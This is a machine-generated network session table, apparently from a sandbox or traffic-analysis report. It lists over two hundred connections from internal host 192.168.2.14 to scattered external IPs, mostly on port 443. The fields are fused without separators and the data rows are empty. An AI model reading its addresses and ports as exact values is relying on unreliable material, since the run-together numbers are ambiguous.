                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15214192.168.2.14388904.142.76.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15215192.168.2.14414922.113.16.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15216192.168.2.145884437.115.39.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15217192.168.2.144049695.43.204.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15218192.168.2.145991299.244.246.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15219192.168.2.1455742164.191.222.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15220192.168.2.14341089.245.132.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15221192.168.2.14600145.101.158.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15222192.168.2.144973892.94.81.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15223192.168.2.1455634177.23.60.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15224192.168.2.1459014150.191.60.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15225192.168.2.1443368110.242.15.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15226192.168.2.1451696104.114.189.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15227192.168.2.1442582192.205.18.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15228192.168.2.1451140190.224.94.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15229192.168.2.1437240157.91.187.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15230192.168.2.143363241.240.115.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15231192.168.2.1433086134.38.243.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15232192.168.2.144299845.119.196.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15233192.168.2.1438918167.28.241.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15234192.168.2.144934292.105.246.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15235192.168.2.143550097.23.37.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15236192.168.2.1437788154.93.167.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15237192.168.2.1441222212.8.135.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15238192.168.2.145179060.29.194.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15239192.168.2.1452362174.134.93.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15240192.168.2.1450768131.247.77.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15241192.168.2.1435496116.5.193.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15242192.168.2.1453420199.72.90.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15243192.168.2.1438580169.14.181.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15244192.168.2.1440356121.30.245.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15245192.168.2.1440394177.39.151.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15246192.168.2.1455504158.127.225.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15247192.168.2.144400278.101.45.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15248192.168.2.1458830193.171.154.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15249192.168.2.144737261.221.14.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15250192.168.2.144039866.159.125.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15251192.168.2.145260041.210.143.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15252192.168.2.1433106199.170.1.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15253192.168.2.145225660.88.82.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15254192.168.2.1458514165.78.228.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15255192.168.2.145466242.123.120.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15256192.168.2.143809435.198.136.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15257192.168.2.143435236.90.229.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15258192.168.2.1457030137.2.12.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15259192.168.2.1444428218.51.23.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15260192.168.2.145140276.141.140.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15261192.168.2.1458970212.115.194.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15262192.168.2.1434924126.229.4.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15263192.168.2.1448200130.155.155.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15264192.168.2.1449576121.79.32.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15265192.168.2.1434314122.190.190.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15266192.168.2.1446184153.200.188.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15267192.168.2.1445450124.68.187.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15268192.168.2.143340238.232.66.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15269192.168.2.1439796174.213.146.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15270192.168.2.1444932137.127.215.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15271192.168.2.1442042185.8.235.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15272192.168.2.1447004115.191.102.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15273192.168.2.144503417.112.48.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15274192.168.2.144322236.116.22.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15275192.168.2.14422861.201.135.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15276192.168.2.1451558208.132.22.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15277192.168.2.1438514180.25.126.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15278192.168.2.145714698.88.50.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15279192.168.2.145065075.215.250.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15280192.168.2.1438700181.207.12.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15281192.168.2.1456674115.37.152.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15282192.168.2.143588473.110.140.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15283192.168.2.1459960135.28.68.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15284192.168.2.1441930137.237.135.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15285192.168.2.144649817.248.218.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15286192.168.2.1447484203.190.131.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15287192.168.2.1437882199.54.173.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15288192.168.2.1445624190.181.50.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15289192.168.2.144308043.73.192.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15290192.168.2.144046062.26.211.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15291192.168.2.145746489.91.28.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15292192.168.2.145451013.39.96.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15293192.168.2.144806862.133.27.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15294192.168.2.1433652217.106.185.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15295192.168.2.144067094.230.225.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15296192.168.2.1446002222.64.107.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15297192.168.2.1446312141.84.159.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15298192.168.2.1442688204.186.53.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15299192.168.2.1458912185.66.153.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15300192.168.2.143680893.232.152.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15301192.168.2.143462057.204.212.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15302192.168.2.145874862.7.9.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15303192.168.2.1439778157.117.37.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15304192.168.2.1445606210.235.114.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15305192.168.2.143643493.19.127.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15306192.168.2.1449824192.203.197.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15307192.168.2.145275239.51.209.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15308192.168.2.1449166138.169.122.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15309192.168.2.1444522126.37.44.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15310192.168.2.1440644199.239.61.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15311192.168.2.1459352163.176.167.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15312192.168.2.145911691.240.17.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15313192.168.2.1434508105.30.205.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15314192.168.2.1433160157.40.14.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15315192.168.2.144900258.104.41.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15316192.168.2.1446974100.182.23.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15317192.168.2.1439428157.231.99.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15318192.168.2.1436746177.102.152.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15319192.168.2.1454938171.63.148.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15320192.168.2.1436344137.133.81.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15321192.168.2.1444726105.165.192.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15322192.168.2.1450902114.136.176.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15323192.168.2.1451392134.170.197.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15324192.168.2.144407853.240.71.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15325192.168.2.1442968184.37.106.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15326192.168.2.143309861.215.128.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15327192.168.2.1459726137.109.178.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15328192.168.2.1434982142.119.236.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15329192.168.2.1454232201.195.82.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15330192.168.2.144571835.101.162.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15331192.168.2.1448372196.77.208.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15332192.168.2.1446560190.115.238.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15333192.168.2.144053417.225.153.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15334192.168.2.143961641.22.111.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15335192.168.2.1456662210.246.8.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15336192.168.2.1451610153.54.137.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15337192.168.2.1453252112.127.102.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15338192.168.2.1438146144.119.135.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15339192.168.2.143837259.220.48.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15340192.168.2.145964038.57.66.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15341192.168.2.1445158194.80.183.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15342192.168.2.1453888161.8.85.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15343192.168.2.1456246208.246.18.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15344192.168.2.1456928117.90.161.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15345192.168.2.144484038.5.197.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15346192.168.2.144700080.35.178.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15347192.168.2.1451614136.252.176.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15348192.168.2.1451122212.5.59.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15349192.168.2.145874890.161.210.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15350192.168.2.14565109.34.174.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15351192.168.2.1440884222.127.155.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15352192.168.2.1441110117.73.228.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15353192.168.2.145744623.45.97.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15354192.168.2.1435860201.226.142.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15355192.168.2.1458596172.191.119.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15356192.168.2.1454474194.169.94.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15357192.168.2.143616293.206.29.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15358192.168.2.145944484.207.57.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15359192.168.2.143833014.110.200.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15360192.168.2.145093095.133.118.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15361192.168.2.144761864.173.75.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15362192.168.2.1457710182.13.91.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15363192.168.2.1452068223.21.240.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15364192.168.2.1433710150.227.63.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15365192.168.2.1449418104.92.208.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15366192.168.2.145203880.83.191.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15367192.168.2.1451404152.187.85.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15368192.168.2.1445136197.39.100.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15369192.168.2.1454108197.10.93.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15370192.168.2.1440562198.134.39.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15371192.168.2.145737679.39.146.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15372192.168.2.1435594112.223.100.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15373192.168.2.1445852146.166.65.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15374192.168.2.1460080201.126.216.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15375192.168.2.1455226195.43.249.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15376192.168.2.1451324155.143.241.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15377192.168.2.1453062109.248.127.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15378192.168.2.1458540143.164.204.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15379192.168.2.1452122157.63.110.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15380192.168.2.143573471.86.137.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15381192.168.2.143620267.253.34.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15382192.168.2.143377086.88.62.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15383192.168.2.1438608104.164.252.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15384192.168.2.1458062152.200.239.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15385192.168.2.1455572174.91.226.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15386192.168.2.1448994218.86.144.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15387192.168.2.1459758136.1.114.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15388192.168.2.143544454.136.91.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15389192.168.2.145998473.42.25.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15390192.168.2.1455568112.52.98.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15391192.168.2.1440114182.178.30.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15392192.168.2.144802879.235.189.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15393192.168.2.1458140165.183.84.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15394192.168.2.145278458.171.41.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15395192.168.2.1460212125.230.143.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15396192.168.2.145074031.200.60.1628080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15397192.168.2.145971885.187.213.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15398192.168.2.143404665.207.106.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15399192.168.2.1453100132.221.216.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15400192.168.2.1447784195.135.236.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15401192.168.2.1436640137.35.35.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15402192.168.2.143884257.80.180.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15403192.168.2.1434046195.143.12.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15404192.168.2.145462248.157.4.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15405192.168.2.1458808166.84.195.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15406192.168.2.1450548193.179.64.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15407192.168.2.143422612.25.0.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15408192.168.2.143555437.190.149.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15409192.168.2.1445728213.89.254.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15410192.168.2.145359693.99.120.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15411192.168.2.144774653.131.239.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15412192.168.2.145910880.112.6.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15413192.168.2.144403285.242.212.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15414192.168.2.143501498.66.55.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15415192.168.2.1459858168.53.176.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15416192.168.2.144889072.27.89.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15417192.168.2.143929862.127.97.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15418192.168.2.1449224177.42.127.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15419192.168.2.145336678.166.130.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15420192.168.2.1456006120.194.68.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15421192.168.2.1438778184.179.200.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15422192.168.2.1445784136.68.205.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15423192.168.2.1447506139.72.76.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15424192.168.2.146016051.62.239.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15425192.168.2.1446246105.35.100.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15426192.168.2.1448918136.152.3.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15427192.168.2.1460526109.236.131.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15428192.168.2.143992638.78.177.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15429192.168.2.1439008164.33.224.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15430192.168.2.1459746173.66.9.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15431192.168.2.143449840.246.177.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15432192.168.2.146032681.209.129.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15433192.168.2.143640471.44.1.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15434192.168.2.145759463.174.209.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15435192.168.2.1435426180.37.224.219443
